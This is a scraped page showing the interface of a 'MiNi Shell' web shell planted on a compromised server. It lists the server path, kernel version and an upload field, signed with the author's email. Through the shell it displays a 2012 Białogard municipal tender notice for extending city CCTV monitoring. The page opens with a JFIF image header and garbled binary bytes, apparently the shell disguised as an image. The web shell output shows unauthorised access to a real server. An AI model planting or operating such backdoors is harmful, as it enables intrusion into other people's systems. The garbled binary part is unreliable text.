JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120626/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120626/221380-N-2012.html

<p class="kh_header"><b>Białogard: ROZBUDOWA SYSTEMU MONITORINGU WIZYJNEGO W MIEŚCIE BIAŁOGARD</b><br>
<b>Numer ogłoszenia: 221380 - 2012; data zamieszczenia: 26.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROZBUDOWA SYSTEMU MONITORINGU WIZYJNEGO W MIEŚCIE BIAŁOGARD.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa i instalacja 4 kamer obrotowych wysokiej rozdzielczości na potrzeby rozbudowy sieci monitoringu miejskiego wraz z niezbędnym osprzętem w celu rozbudowy stanowiska operatora monitoringu wraz ze szkoleniem personelu obsługującego system monitoringu ( 4 osoby) i wykonaniem dokumentacji powykonawczej.
Szczegółowy  zakres  zamówienia obejmuje:
1.opracowanie projektu wykonawczego dla przedmiotu zamówienia szczegółowo określonego w specyfikacji istotnych warunków zamówienia;
2.wykonanie na podstawie opracowanego projektu wykonawczego zaakceptowanego przez Zamawiającego robót niezbędnych do wykonania przedmiotu zamówienia;
3.dostawę, montaż i uruchomienie sprzętu wskazanego w specyfikacji istotnych warunków zamówienia łącznie z dostawą oprogramowania oraz uruchomieniem oprogramowania systemu monitoringu wizyjnego i uruchomieniem transmisji danych zgodnie z opracowanym i zaakceptowanym projektem wykonawczym oraz wymogami Zamawiającego określonymi w SIWZ;
1)Dostawa 4 szt. obrotowych kamer PTZ o wysokiej rozdzielczości wraz z niezbędnym oprzyrządowaniem na potrzeby rozbudowy sieci monitoringu miejskiego,
 
Parametry ogólne
Przetwornik obrazu
CMOS 1,8 , z funkcją skanowania progresywnego
Obiektyw f = 4,7-94 mm, F1,6-3,5, autofokus, automatyczny tryb dzień/noc,
kąt widzenia w poziomie: 54,1-2,9° w rozdzielczości HDTV 1080p;
kąt widzenia w pionie: 37,6-2° w rozdzielczości HDTV 720p
Minimalne oświetlenie
Kolor: 0,8 luksa przy 30 IRE F1.6
Cz-b: 0,04 luksa przy 30 IRE F1.6
Obrót pochylenie zbliżenie
Funkcja  E-flip, min 95 gotowych ustawień
20-krotny zoom optyczny i zoom cyfrowy, łącznie zoom 240-krotny
Obrót: 360° bez ograniczeń, Pochylenie: 210°,
Wideo
Kompresja wideo H.264 (MPEG-4 Part 10/AVC) Motion JPEG
Rozdzielczości HDTV 1080p: od 1920x1080 do 320x180
HDTV 720p: od 1280x720 do 320x180
Częstotliwość klatek
H.264: do 30/25 kl./s (60/50 Hz) w rozdzielczości HDTV 1080p
H.264: do 60/50 kl./s (60/50 Hz) w rozdzielczości HDTV 720p Motion
JPEG: do 25 kl./s (60/50 Hz) w rozdzielczości HDTV 1080p Motion
JPEG: do 50 kl./s (60/50 Hz) w rozdzielczości HDTV 720p
Strumieniowe przesyłanie wideo
Wiele oddzielnie konfigurowalnych strumieni w formatach H.264 i Motion JPEG
Sieć
Bezpieczeństwo Ochrona hasłem, filtrowanie adresów IP, szyfracja HTTPS*, mechanizm kontroli
dostępu IEEE 802.1X, uwierzytelnianie skrócone dziennik dostępu użytkowników
Obsługiwane protokoły
IPv4/v6, HTTP, HTTPS*, QoS Layer 3 DiffServ, FTP, SMTP, Bonjour,
UPnP, SNMPv1/v2c/v3 (MIB-II), DNS, DynDNS, NTP, RTSP, RTP, TCP,
UDP, IGMP, RTCP, ICMP, DHCP, ARP, SOCKS
standard ONVIF
Warunki pracy
Wilgotność 20-80% RH (bez kondensacji) od -40 °C do 50 °C
Zgodność z normami
EN 55022 klasa B, EN 61000-3-2, EN 61000-3-3, EN 61000-6-1,
EN 61000-6-2, EN 55024, FCC część 15 sekcja B klasa B,

 
2)Instalację wyżej wymienionych kamer na wskazanych budynkach przy ulicach: 
- Polnej 7, 
- Malinowskiego 2, 
- Zamoyskiego 14, 
-Wojska Polskiego 7
3)Dostawa monitora LCD 42 do stanowiska operatora monitoringu znajdującego się w budynku Komendy Powiatowej Policji w Białogardzie,
 
Parametry ogólne
Typ: LCD
Kolor obudowy: Czarny
Wysokość [mm]: 613.5
Szerokość [mm]: 1022.9
Głębokość [mm]: 105.6
Waga [kg]: brak danych
Parametry grafiki
Typ matrycy: TFT S-IPS
Matryca błyszcząca: Nie
Typ panelu dotykowego: Nie
Przekątna ekranu [cal]: 42
Nominalna rozdzielczość [px]: 1920 x 1080
Jasność [cd/m2]: 500
Kontrast: 1300:1
Czas reakcji matrycy [ms]: 10
Kąt widzenia w pionie [stopnie]: 178
Kąt widzenia w poziomie [stopnie]: 178
Ilość wyświetlanych kolorów [mln]: 16,7 mln
Częstotliwość odchylania pionowego (Cyfrowa)[Hz]: 25,2-85
Częstotliwość odchylania poziomego (Cyfrowa) [kHz]: 31,5-91,1
Częstotliwość odświeżania przy rozdzielczości optymalnej [Hz]: 60
Złącza
HDMI: Tak
D-Sub: 1
DVI: Tak
USB [szt.]: Nie
Gniazda wejściowe: DisplayPort
Funkcje
Technologie:
Pozostałe parametry
Czytnik kart: Nie
Wbudowana kamera: Nie
Tuner TV: Nie
Głośniki: Tak
Głośniki (opis): 10
Mikrofon: Nie
Pivot: Nie
Pochylenie (w górę/w dół): Nie
Obrót (lewo/prawo): Nie
Wbudowany zasilacz: Nie
Możliwość zawieszenia na ścianie: 300 x 300

 
4)Dostawa i instalacja szafy dystrybucyjnej stojącej RACK 19 /22U/800x900 do stanowiska operatora monitoringu znajdującego się w budynku Komendy Powiatowej Policji w Białogardzie,
Parametry ogólne
Wysokość wewnętrzna: 22 U
Wysokość: 1080 mm
Wysokość użytkowa: 978 mm
Szerokość: 800 mm
Szerokość użytkowa: 687 mm
Głębokość: 900 mm
Drzwi: Przeszklone
Masa netto: 75 kg
Maks. ładowność: 300 kg
5)Dostawa i instalacja 2 szt. dysków twardych do rozbudowy istniejącej przestrzeni dyskowej serwera archiwizacji obrazu,
Parametry ogólne
format szerokości 3.5 cala
typ magnetyczny
pojemność 2000 GB
interfejs Serial ATA III
rodzina produktu SV35 lub równoważne dedykowane do CCTV
prędkość obrotowa 7200 obr./min.
pamięć cache 64 MB
maks. transfer zewnętrzny 600 MB/s
średni czas dostępu 9 ms
6)Dostawę i instalację rozszerzenia dla posiadanych licencji typu NetStation - System IP na oprogramowanie NetProffesional przeznaczonego na serwer archiwizacji obrazu dla kolejnych 8 kamer IP lub równoważny 
7)Dostawa i instalacja 5 szt. zasilaczy awaryjnych UPS 500 W,

4.zintegrowanie programowe i sprzętowe wszystkich dostarczonych urządzeń z istniejącym systemem monitoringu wizyjnego miasta Białogard; 
5.przeszkolenie 4 osób wskazanych przez Zamawiającego z zakresu obsługi systemu monitoringu wizyjnego oraz przekazanie co najmniej 3 kompletów instrukcji administrowania systemem i instrukcji obsługi;
6.doprowadzenie elewacji budynków i innych obiektów do stanu pierwotnego;
7.opracowanie i przekazanie Zamawiającemu dokumentacji powykonawczej systemu.
Zakres prac uwzględniono w kosztorysie inwestorskim stanowiącym załącznik..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.12.53.00-2, 30.23.41.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca w okresie ostatnich 3 lat lub jeżeli okres działalności jest krótszy, w tym okresie wykonał co najmniej 2 instalacje i dostawy  o wartości nie niższej niż 50 tys. każda. 
Na potwierdzenie spełnienia warunku należy przedłożyć wykaz wykonanych instalacji i dostaw w zakresie niezbędnym do wykazania spełnienia   warunku  wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane należycie.Wykonawca może polegać na wiedzy i doświadczeniu podmiotów trzecich, na zasadzie korzystania 
z zasobów udostępnionych na czas realizacji zamówienia, dołączając do oferty pisemne zobowiązanie tych podmiotów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca dysponuje co najmniej 1 osobą posiadającą uprawnienia do pracy na wysokości.
Na potwierdzenie spełnienia warunku wykonawca  przedstawi wykaz osób, które będą uczestniczyć w wykonaniu zamówienia z uwzględnieniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz zakresem:
- wykonywanych przez nie czynności i informacją o podstawie dysponowania osobami,
- oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek ich posiadania.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia udostępnionych przez inne podmioty. W takim wypadku musi dołączyć do oferty pisemne zobowiązanie tych podmiotów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę należy sporządzić w języku polskim, w formie pisemnej, wypełniając formularz oferty, stanowiący załącznik nr 1 do SIWZ, ręcznie w sposób czytelny albo na komputerze lub maszynowo oraz dołączyć oświadczenie o spełnieniu warunków udziału w postępowaniu wg załącznika nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Istotne dla stron postanowienia umowy znajdują się we wzorze umowy stanowiącym załącznik nr 7 do SIWZ.
2.Podstawę rozliczeń będą stanowić ceny i stawki podane przez Wykonawcę w ofercie.
3.Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia,
b)wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy,
c)w przypadku zmiany stawek podatku od towarów i usług (VAT), skutkujących koniecznością zmiany wynagrodzenia, 
d)wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania SIWZ i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia
4.Zmiany umowy w zakresie dopuszczalnym przez ustawę Prawo zamówień publicznych wymagają dla swej ważności formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bialogard.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Białogard, ul. 1 Maja 18, 78-200 Białogard, pok.216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.07.2012 godzina 09:00, miejsce: Urząd Miasta Białogard, ul. 1 Maja 18, 78-200 Białogard,sekretariat pok.224.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com